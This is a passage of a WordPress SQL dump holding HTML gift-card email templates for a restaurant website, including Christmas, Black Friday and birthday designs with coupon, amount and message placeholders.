cellspacing=\"0\" width=\"100%\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"padding: 0px 25px;\"> [DEFAULTEVENT] </td></tr></table> </td><td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align: top;\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td class=\"gift-baskets-content\" style=\"font-size: 15px; line-height: 20px;word-wrap:break-word;\"> <p style=\"color:#000;word-spacing: 5px;;height: auto; min-height: 200px; \">[MESSAGE]</p></td></tr><tr> <td class=\"mail-content\" style=\"word-wrap:break-word\";> <span style=\"color: #000; font-size: 15px; float: left; vertical-align:top;  text-align: right;display-inline:block; \">From- </span> <span style=\"color:#000;font-size:14px; vertical-align:top; display:inline-block; width:180px; float:left;\">[FROM]</span> </td></tr><tr> <td style=\"word-wrap:break-word\";> <p><span style=\"color: #000; font-size: 15px;\">To- </span> <span style=\"color:#000;font-size:14px; vertical-align:top;\">[TO]</span></p> </td></tr><tr><td style=\"word-wrap:break-word;\"> <span style=\"color:#8a2814;font-size: 23.96px; vertical-align:top; \"><strong>[AMOUNT]/-</strong> </span></td></tr></table> </td></td></tr></table> </td></tr><tr> <td bgcolor=\"#ffd064\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td style=\"padding: 40px 30px; font-family: sans-serif; font-size: 15px; line-height: 20px; color: rgb(0, 0, 0); text-align: center;\"> [DISCLAIMER] </td></tr></table> </td></tr><style>@media screen and (max-width: 600px){.email-container{width: 100% !important; margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */ .fluid{max-width: 90% !important; height: auto !important; margin-left: auto !important; margin-right: auto !important;}/* What it does: Forces table cells into full-width rows. */ /* And center justify these ones. */ .stack-column-center{text-align: center !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */ .center-on-narrow{text-align: center !important; display: block !important; margin-left: auto !important; margin-right: auto !important; float: none !important;}table.center-on-narrow{display: inline-block !important;}}@media screen and (max-width: 476px){.stack-column, .stack-column-center{display: block !important; width: 100% !important; max-width: 100% !important; direction: ltr !important;}}</style>','Mothers Day','','publish','closed','closed','','mothers-day-2','','','2017-07-11 09:39:37','2017-07-11 07:39:37','',0,'http://www.ristorantesolymar.it/giftcard/mothers-day-2/',0,'giftcard','',0),(458,1,'2017-07-11 09:39:37','2017-07-11 07:39:37','<center style=\"width: 100%;\"> <div style=\"display:none;font-size:1px;line-height:1px;max-height:0px;max-width:0px;opacity:0;overflow:hidden;mso-hide:all;font-family: sans-serif;\"> (Optional) This text will appear in the inbox preview, but not the email body. </div><!-- <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"><tr><td style=\"padding: 20px 0; text-align: center\"><img src=\"http://placehold.it/200x50\" width=\"200\" height=\"50\" alt=\"alt_text\" border=\"0\" style=\"height: auto; background: #dddddd; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #555555;\"></td></tr></table> --> <table role=\"presentation\" style=\"margin: auto;\" class=\"email-container\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"> <tbody> <tr style=\"background-color:#C9FFFB;\"> <td style=\" text-align:left; font-family: sans-serif;color: #AD1D20;\"> <h2 style=\"margin:0px; padding-left:25px; padding-top:25px;\">[LOGO]</h2> </td></tr></tbody> </table> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"> <tr> <td bgcolor=\"#c9fffb\" style=\"padding: 20px 0 50px;\"> <span style=\"display:block; margin:0 auto;\" class=\"feature_image\"> [FEATUREDIMAGE] </span> </td></tr><tr> <td background=\"http://placehold.it/600x230/222222/666666\" bgcolor=\"#222222\" valign=\"middle\" style=\"text-align: center; background-position: center center !important; background-size: cover !important;\"><!--[if gte mso 9]> <v:rect xmlns:v=\"urn:schemas-microsoft-com:vml\" fill=\"true\" stroke=\"false\" style=\"width:600px;height:175px; background-position: center center !important;\"> <v:fill type=\"tile\" src=\"http://placehold.it/600x230/222222/666666\" color=\"#222222\"/> <v:textbox inset=\"0,0,0,0\"><![endif]--> <div> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td valign=\"middle\" style=\"text-align: center; font-family: sans-serif; font-size: 22px; mso-height-rule: exactly; line-height: 20px; color: #ffffff; background-color: #ad1d20; letter-spacing: 0px;\"> <p style=\"padding: 25px 20px; text-align:center!important; border: 2px dashed #fff; margin: 10px 10px;\"><span style=\"font-size:22px;display:block\">COUPON</span><span style=\"font-size:30px;display:block;padding:15px 0px;\">[COUPON]</span><span style=\"font-size:22px;display:block\">(Ed:[EXPIRYDATE])</span></p></td></tr></table> </div><!--[if gte mso 9]> </v:textbox> </v:rect><![endif]--> </td></tr><tr> <td bgcolor=\"#C9FFFB\" dir=\"ltr\" align=\"center\" valign=\"top\" width=\"100%\" style=\"padding:70px 10px 70px;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align:top;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"padding: 0 10px; text-align: center;/*background: #fff;*/ border-radius: 5px; width: 50%;\"> [DEFAULTEVENT] </td></tr></table> </td><td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align: top\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 22px; color: #555555; padding:0 10px; text-align: left;word-wrap: break-word;\" class=\"center-on-narrow\"> <p style=\"font-size: 15px; min-height:172px; height:auto; margin:0;word-break: break-word;\"> [MESSAGE]</p><p style=\"margin:0;\"><span style=\"font-size: 15px; display:inline-block; text-align:right;word-break: break-all;\">From: </span> <span style=\"display:inline-block; vertical-align:top; word-break: break-all;\">[FROM]</span></p><p style=\"margin-top:0;\"><span style=\"font-size: 15px;vertical-align:top; display:inline-block; text-align:right; word-break: break-all;\">To: </span> <span style=\"display:inline-block; vertical-align:top; word-break: break-all;\">[TO]</span><p> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" class=\"center-on-narrow\" style=\"float:left;\"> <tr> <td style=\"word-wrap:break-word\";><p style=\"font-size: 26px; color: #ad1d20; margin:0px 0px 0px 0px;text-align: left;float: left;\"><strong>[AMOUNT]/-</strong></p></td></tr></table> </td></tr></table> </td></tr></table> </td></tr><tr> <td bgcolor=\"#ffffff\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td style=\"padding: 40px 30px; font-family: sans-serif; font-size: 16px; mso-height-rule: exactly; line-height: 20px; color: #fff; background-color:#ad1d20;\"> <p style=\"font-size: 15px; letter-spacing: 0px; word-spacing: 1px;\">[DISCLAIMER]</p></td></tr></table> </td></tr></table> </center><style>/* Media Queries */ @media screen and (max-width: 600px){.email-container{width: 100% !important; margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */ .fluid{max-width: 100% !important; height: auto !important; margin-left: auto !important; margin-right: auto !important;}/* What it does: Forces table cells into full-width rows. */ /* And center justify these ones. */ .stack-column-center{text-align: center !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */ .center-on-narrow{text-align: left !important; display: block !important; margin-left: auto !important; margin-right: auto !important; float: none !important;}table.center-on-narrow{display: inline-block !important;}}@media screen and (max-width: 599px){.stack-column, .stack-column-center{display:block !important; width: 100% !important; max-width: 100% !important; direction: ltr !important;}}</style>','Christmas','','publish','closed','closed','','christmas-2','','','2017-07-11 09:39:37','2017-07-11 07:39:37','',0,'http://www.ristorantesolymar.it/giftcard/christmas-2/',0,'giftcard','',0),(459,1,'2017-07-11 09:39:37','2017-07-11 07:39:37','<center style=\"width: 100%;\"> <div style=\"display:none;font-size:1px;line-height:1px;max-height:0px;max-width:0px;opacity:0;overflow:hidden;mso-hide:all;font-family: sans-serif;\"> (Optional) This text will appear in the inbox preview, but not the email body. </div><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"> <tr> <td style=\"padding: 20px 0 0 40px; text-align:left;color:#fff;background-color: #000;\"> [LOGO] </td></tr></table> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin:auto;padding:0;\" class=\"email-container\"> <tr> <td bgcolor=\"#000\"> <span class=\"feature_img\"> [FEATUREDIMAGE] </span> </td></tr><tr> <td bgcolor=\"#000\" style=\"padding:0 10px 30px;text-align: center; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; color: #555555;\"> <p style=\"font-size: 16px;border: 2px dashed red; text-align:center; line-height:40px; padding: 5% 20% ;margin: 0 auto;display:block;color:#fff;text-transform: uppercase;\">coupon <span style=\"display:block;font-size: 28.75px;\">[COUPON]</span> <span style=\"display:block;font-size:16px;\">(Ed:[EXPIRYDATE])</span></p></td></tr><tr><td bgcolor=\"#000\" dir=\"ltr\" align=\"center\" valign=\"top\" width=\"100%\" style=\"padding-bottom: 44px;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align:top;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" \"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"padding: 0px 25px; width: 50%;\"> [DEFAULTEVENT] </td></tr></table> </td><td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align: top;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #ffffff; padding: 0px 15px; text-align: left;\" class=\"center-on-narrow\"> <p style=\"font-size: 15px; line-height: 24px; text-align: left; color: #fff; min-height: 200px;white-space: pre-line;word-break: break-word;\">[MESSAGE] </p></td></tr><tr><td class=\"mail-content\" style=\"word-wrap: break-word;font-family: sans-serif; padding: 0px 15px;\"><span style=\"color: #fff; font-size: 15px; float: left; vertical-align: top; text-align: right; display-inline: block; \">From- </span> <span style=\"color: #fff; font-size: 14px; vertical-align: top; display: inline-block; float: left; word-break: break-all;\">[FROM]</span></td></tr><tr><td style=\"word-wrap: break-word; font-family: sans-serif; padding: 0px 15px;\"><span style=\"color:#fff; font-size: 15px;  float: left; display: inline-block; vertical-align: top;\">To- </span> <span style=\"color: #fff; font-size: 14px; width: 180px; float: left; vertical-align: top; word-break: break-all;\">[TO]</span></td></tr><tr><td style=\"padding: 5px 10px; word-wrap: break-word;\"><span style=\"color: #8a2814; font-size: 23.96px; vertical-align: top;\"><strong>[AMOUNT]/-</strong> </span></td></tr></table> </td></tr></table> </td></tr><tr> <td bgcolor=\"#ed1c24\" > <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td style=\"padding: 30px 35px; font-family: sans-serif; text-align:center; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff;\"> [DISCLAIMER] </td></tr></table> </td></tr></table></center><style type=\"text/css\">/* Media Queries */ @media screen and (max-width: 600px){.email-container{width: 100% !important; margin: auto !important;}@media screen and (max-width: 599px){.stack-column, .stack-column-center{display: block !important; width: 100% !important; max-width: 85% !important; direction: ltr !important;}}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */ .fluid{max-width: 100% !important; height: auto !important; margin-left: auto !important; margin-right: auto !important;}/* What it does: Forces table cells into full-width rows. */ /* And center justify these ones. */ .stack-column-center{text-align: center !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */ .center-on-narrow{text-align: center !important; display: block !important; margin-left: auto !important; margin-right: auto !important; float: none !important;}table.center-on-narrow{display: inline-block !important;}}@media screen and (max-width: 320px){.stack-column-center{display:block; width:100%; margin:0 auto;}}.feature_img img{display: block; margin: 0 auto; max-width: 100%; width:100%;}</style>','Black Friday','','publish','closed','closed','','black-friday-2','','','2017-07-11 09:39:37','2017-07-11 07:39:37','',0,'http://www.ristorantesolymar.it/giftcard/black-friday-2/',0,'giftcard','',0),(460,1,'2017-07-11 09:39:37','2017-07-11 07:39:37','<center style=\"width: 100%;\"><div style=\"display: none; font-size: 1px; line-height: 1px; max-height: 0px; max-width: 0px; opacity: 0; overflow: hidden; mso-hide: all; font-family: sans-serif;\">(Optional) This text will appear in the inbox preview, but not the email body.</div><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"><tr><td style=\"padding: 0px 0px 20px; text-align: center; background: #b2dbff \"><p style=\"color:#80150b; font-size: 25px; font-family: sans-serif; margin: 0px;\"><strong>[LOGO] </strong></p></td></tr></table>&nbsp;<table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin-top:-21px !important;\" class=\"email-container\"><tr><td bgcolor=\"#b2dbff\"><span class=\"feature_img\"> [FEATUREDIMAGE] </span></td></tr><tr><td style=\"padding: 10px; text-align: center; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #555555;\" bgcolor=\"#1d568c\"><p style=\"background: #1d568c; border: 4px dashed #fff; color: #fff; font-size:15px; letter-spacing: 0px; padding: 33px 0; text-transform: uppercase; margin: 0; line-height:29px;\">coupon code<span style=\"display:block; font-size:25px;\">[COUPON]</span> <span style=\"display:block; font-size:15px;\">(Ed:[EXPIRYDATE]</span></p></td></tr><tr><td align=\"center\" valign=\"top\" bgcolor=\"#b2dbff\" style=\"padding:70px 0 70px 0\"><table role=\"presentation\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" border=\"0\"><tbody><tr><td class=\"stack-column-center\" style=\"width: 50%; vertical-align: top;\"><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" border=\"0\"><tbody><tr><td style=\"padding: 0 15px; text-align: center;vertical-align:top; width: 50%;\">[DEFAULTEVENT]</td></tr></tbody></table></td><td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%; \"><table role=\"presentation\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" border=\"0\"><tbody><tr><td class=\"gift-baskets-content\" style=\"padding: 0 15px;word-wrap:break-word;\"><p style=\"color: #000; font-size: 16px;height:auto;min-height:180px;padding:0 0 20px 0; word-break: break-word;\">[MESSAGE]</p></td></tr><tr><td style=\"word-wrap:break-word\";><p style=\"font-size: 16px; color: #000; margin: 0;\"><span style=\"display: inline-block; vertical-align:top; text-align: right;\">From-</span><span style=\"font-size: 15px; display: inline-block; text-align: left;vertical-align:top; word-break: break-all;\">[FROM]</span></p></td></tr><tr><td style=\"word-wrap:break-word\";><p style=\"font-size: 16px; color: #000; margin: 0;\"><span style=\"display: inline-block; text-align: right;\">To-</span><span style=\"font-size: 15px; display: inline-block; text-align: left;vertical-align:top; word-break: break-all;\">[TO]</span></p></td></tr><tr><td style=\"word-wrap:break-word\";><p style=\"font-size: 31px; color: #1e578d;margin:0px 0px 0px 16px;\"><strong>[AMOUNT]/-</strong></p></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td bgcolor=\"#1d568c\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"padding: 30px 35px; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff; text-align: center;\">[DISCLAIMER]</td></tr></tbody></table></td></tr></tbody></table>&nbsp;</center><style>@media screen and (max-width: 599px){.email-container{width: 100% !important;margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */.fluid{max-width: 100% !important;height: auto !important;margin-left: auto !important;margin-right: auto !important;}/* What it does: Forces table cells into full-width rows. */.stack-column,.stack-column-center{display: block !important;width: 100% !important;max-width: 100% !important;direction: ltr !important;}/* And center justify these ones. */.stack-column-center{text-align: center !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */.center-on-narrow{text-align: center !important;display: block !important;margin-left: auto !important;margin-right: auto !important;float: none !important;}table.center-on-narrow{display: inline-block !important;}}.feature_img > img{margin: 0 auto; display: block;width: 100%; height: 400px;}</style>','Independence Day','','publish','closed','closed','','independence-day-2','','','2017-07-11 09:39:37','2017-07-11 07:39:37','',0,'http://www.ristorantesolymar.it/giftcard/independence-day-2/',0,'giftcard','',0),(461,1,'2017-07-11 09:39:37','2017-07-11 07:39:37','<center style=\"width: 100%;\"><div style=\"display: none; font-size: 1px; line-height: 1px; max-height: 0px; max-width: 0px; opacity: 0; overflow: hidden; mso-hide: all; font-family: sans-serif;\">(Optional) This text will appear in the inbox preview, but not the email body.</div><table class=\"email-container\" style=\"margin: auto;\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"background: #311438; padding-left: 15px;\"><p style=\"color: #ffffff; font-size: 25px; font-family: sans-serif; padding: 30px 0px 0px; margin: 0px; text-align: center;\"><strong>[LOGO]</strong></p></td></tr></tbody></table><table class=\"email-container\" style=\"margin: auto;\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td style=\"padding-bottom: 30px; text-align: center;\" bgcolor=\"#311438\"><span class=\"feature_img\">[FEATUREDIMAGE]</span></td></tr><tr style=\"background-color: #afcb0c;\"><td style=\"color: #fff; font-size: 20px; letter-spacing: 1px; margin: 0; text-transform: uppercase; background-color: #afcb0c; padding: 20px 10px; line-height: 15px;\"><p style=\"border: 2px dashed #ffffff; color: #fff; font-size: 20px; letter-spacing: 0px; padding: 30px 10px; line-height: 30px; margin: 0; text-transform: uppercase; background-color: #afcb0c; text-align: center;\">Coupon Code<span style=\"display: block; font-size: 25px;\">[COUPON]</span><span style=\"display: block;\">Ed:[EXPIRYDATE]</span></p></td></tr><tr><td dir=\"ltr\" style=\"padding-bottom: 44px;\" align=\"center\" valign=\"top\" bgcolor=\"#feffda\" width=\"100%\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td class=\"stack-column-center\" style=\"vertical-align: top;\" width=\"50%\"><table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td dir=\"ltr\" style=\"padding: 0px 25px;  width: 50%; valign=\"top\">[DEFAULTEVENT]</td></tr></tbody></table></td><td class=\"stack-column-center\" style=\"vertical-align: top;\" width=\"50%\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #ffffff; padding: 0px 15px; text-align: left;\" valign=\"top\"><p style=\"font-size: 15px; line-height: 24px; text-align: justify; color: #535151; min-height: 200px; white-space: pre-line;\">[MESSAGE]</p></td></tr><tr><td class=\"mail-content\" style=\"word-wrap: break-word; font-family: sans-serif; padding: 0px 15px;\"><span style=\"color: #535151; font-size: 15px; float: left; vertical-align: top; text-align: right; display-inline: block; \">From- </span> <span style=\"color: #535151; font-size: 14px; vertical-align: top; display: inline-block; width: 180px; float: left;\">[FROM]</span></td></tr><tr><td style=\"word-wrap: break-word; font-family: sans-serif; padding: 0px 15px;\"><span style=\"color: #535151; font-size: 15px; max-width: 15%; float: left; margin-right: 2%; text-align: right; width: 100%; display: inline-block; vertical-align: top;\">To- </span> <span style=\"color: #535151; font-size: 14px; width: 180px; float: left; vertical-align: top;\">[TO]</span></td></tr><tr><td style=\"padding: 5px 10px; word-wrap: break-word;\"><span style=\"color: #8a2814; font-size: 23.96px; vertical-align: top;\"><strong>[AMOUNT]/-</strong> </span></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td bgcolor=\"#6f3e7f\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"padding: 10px 30px; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #ffffff;\"><p style=\"font-weight: bold; text-align: center;\">[DISCLAIMER]</p></td></tr></tbody></table></td></tr></tbody></table></center><style>@media screen and (max-width: 600px){.email-container{width: 100% !important;margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */.fluid{max-width: 90% !important;height: auto !important;margin-left: auto !important;margin-right: auto !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */.center-on-narrow{text-align: center !important;display: block !important;margin-left: auto !important;margin-right: auto !important;float: none !important;}table.center-on-narrow{display: inline-block !important;}}@media screen and (max-width: 476px){/* What it does: Forces table cells into full-width rows. */.stack-column,.stack-column-center{display: block !important;width: 100% !important;max-width: 100% !important;direction: ltr !important;}/* And center justify these ones. */.stack-column-center{text-align: center !important;}}</style>','Happy New Year','','publish','closed','closed','','happy-new-year-2','','','2017-07-11 09:39:37','2017-07-11 07:39:37','',0,'http://www.ristorantesolymar.it/giftcard/happy-new-year-2/',0,'giftcard','',0),(462,1,'2017-07-11 09:39:37','2017-07-11 07:39:37','<center style=\"width: 100%;\"> <div style=\"display:none;font-size:1px;line-height:1px;max-height:0px;max-width:0px;opacity:0;overflow:hidden;mso-hide:all;font-family: sans-serif;\"> (Optional) This text will appear in the inbox preview, but not the email body. </div><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto\" class=\"email-container\"> <tr> <td style=\"text-align: center; background:#E25A9D \"> <p style=\"color:#fff; font-size: 25px; font-family: sans-serif; padding: 30px 0 0; margin: 0px;\"><strong>[LOGO]</strong></p></td></tr></table> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"> <tr> <td bgcolor=\"#E25A9D\" style=\"padding-bottom: 30px;\"> <span class=\"feature_img\">[FEATUREDIMAGE]</span> </td></tr><tr> <td bgcolor=\"#FFE0EF\" style=\"padding:30px; text-align: center; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; color: #555555; \"></td><tr style=\"background-color: #E25A9D\"><td style=\"color: #fff; font-size:20px; letter-spacing: 0px; margin:0; text-transform: uppercase; background-color: #E25A9D; padding:20px 10px; line-height: 0;\"> <p style=\"border: 2px dashed #ffffff; color: #fff; font-size:20px; padding: 30px 10px; margin:0; text-transform: uppercase; background-color: #E25A9D; text-align: center; line-height: 30px;\">Coupon Code<span style=\"display:block; font-size: 25px;\">[COUPON]</span><span style=\"display:block;\">Ed:[EXPIRYDATE]</span></p><br><br></td></tr><td bgcolor=\"#FFE0EF\" style=\"padding-top: 45px; text-align: center; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; color: #555555; \"> </td></tr><tr> <td bgcolor=\"#ffe0ef\" dir=\"ltr\" align=\"center\" valign=\"top\" width=\"100%\" style=\"padding-bottom: 44px;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align:top;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" \"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"padding: 0px 25px; width: 50%;\"> [DEFAULTEVENT] </td></tr></table> </td><td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align: top;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #ffffff; padding: 0px 15px; text-align: left;\" class=\"center-on-narrow\"> <p style=\"font-size: 15px; line-height: 24px; text-align: left; color: #535151; min-height: 200px;white-space: pre-line;word-break: break-word;\">[MESSAGE] </p></td></tr><tr><td class=\"mail-content\" style=\"word-wrap: break-word;font-family: sans-serif; padding: 0px 15px;\"><span style=\"color: #535151; font-size: 15px; float: left; vertical-align: top; text-align: right; display-inline: block; \">From- </span> <span style=\"color: #535151; font-size: 14px; vertical-align: top; display: inline-block; float: left; word-break: break-all;\">[FROM]</span></td></tr><tr><td style=\"word-wrap: break-word; font-family: sans-serif; padding: 0px 15px;\"><span style=\"color:#535151; font-size: 15px; float: left; display: inline-block; vertical-align: top;\">To- </span> <span style=\"color: #535151; font-size: 14px; width: 180px; float: left; vertical-align: top; word-break: break-all;\">[TO]</span></td></tr><tr><td style=\"padding: 5px 10px; word-wrap: break-word;\"><span style=\"color: #8a2814; font-size: 23.96px; vertical-align: top;\"><strong>[AMOUNT]/-</strong> </span></td></tr></table> </td></tr></table> </td></tr><tr> <td bgcolor=\"#e5609f\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td style=\"padding: 40px 30px; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #ffffff;\"> <p style=\"font-weight: bold; text-align:center;\"> [DISCLAIMER] </p></td></tr></table> </td></tr></table></center><style>@media screen and (max-width: 600px){.email-container{width: 100% !important; margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */ .fluid{max-width: 90% !important; height: auto !important; margin-left: auto !important; margin-right: auto !important;}/* What it does: Forces table cells into full-width rows. */ /* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */ .center-on-narrow{text-align: center !important; display: block !important; margin-left: auto !important; margin-right: auto !important; float: none !important;}table.center-on-narrow{display: inline-block !important;}}@media screen and (max-width: 476px){/* What it does: Forces table cells into full-width rows. */ .stack-column, .stack-column-center{display: block !important; width: 100% !important; max-width: 100% !important; direction: ltr !important;}/* And center justify these ones. */ .stack-column-center{text-align: center !important;}}</style>','Happy Birth Day','','publish','closed','closed','','happy-birth-day-2','','','2017-07-11 09:39:37','2017-07-11 07:39:37','',0,'http://www.ristorantesolymar.it/giftcard/happy-birth-day-2/',0,'giftcard','',0),(463,1,'2017-07-11 09:39:37','2017-07-11 07:39:37','<center style=\"width: 100%;\"><div style=\"display: none; font-size: 1px; line-height: 1px; max-height: 0px; max-width: 0px; opacity: 0; overflow: hidden; mso-hide: all; font-family: sans-serif;\">(Optional) This text will appear in the inbox preview, but not the email body.</div><table class=\"email-container\" style=\"margin: auto;\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td style=\"text-align: center; background: #f6f6f6;\"><p style=\"color: #192845; font-size: 25px; font-family: sans-serif; margin: 0px;\"><strong>[LOGO]</strong></p></td></tr></tbody></table><table class=\"email-container\" style=\"margin: auto;\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td style=\"padding-bottom: 30px;\" bgcolor=\"#f6f6f6\"><span class=\"feature_img\">[FEATUREDIMAGE]</span></td></tr><tr></tr><tr style=\"background-color: #192845;\"><td style=\"color: #fff; font-size: 20px; margin: 0; text-transform: uppercase; background-color: #192845; padding: 20px 10px; line-height: 0;\"><p style=\"border: 2px dashed #ffffff; color: #fff; font-size: 20px; padding: 10px 10px; line-height: 25px; margin: 0; text-transform: uppercase; background-color: #192845; text-align: center;\">Coupon Code<span style=\"display: block; font-size: 25px;\">[COUPON]</span><span style=\"display: block;\">Ed:[EXPIRYDATE]</span></p></td></tr><tr><td dir=\"ltr\" style=\"padding-top: 10px; padding-bottom: 10px;\" align=\"center\" valign=\"top\" bgcolor=\"#f6f6f6\" width=\"100%\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td class=\"stack-column-center\" style=\"vertical-align: top;\" width=\"100%\"><table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td dir=\"ltr\" style=\"padding: 0px 25px; width: 50%;\" valign=\"top\">[DEFAULTEVENT]</td></tr></tbody></table></td><td class=\"stack-column-center\" style=\"vertical-align: top;\" width=\"100%\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #ffffff; padding: 0px 15px; text-align: left;\" valign=\"top\"><p style=\"font-size: 15px; line-height: 24px; text-align: justify; color: #535151; min-height: 200px; white-space: pre-line;\">[MESSAGE]</p></td></tr><tr><td class=\"mail-content\" style=\"word-wrap: break-word; font-family: sans-serif; padding: 0px 15px;\"><span style=\"color: #535151; font-size: 15px; float: left; vertical-align: top; text-align: right; display-inline: block; \">From- </span> <span style=\"color: #535151; font-size: 14px; vertical-align: top; display: inline-block; width: 180px; float: left;\">[FROM]</span></td></tr><tr><td style=\"word-wrap: break-word; font-family: sans-serif; padding: 0px 15px;\"><span style=\"color: #535151; font-size: 15px; max-width: 15%; float: left; margin-right: 2%; 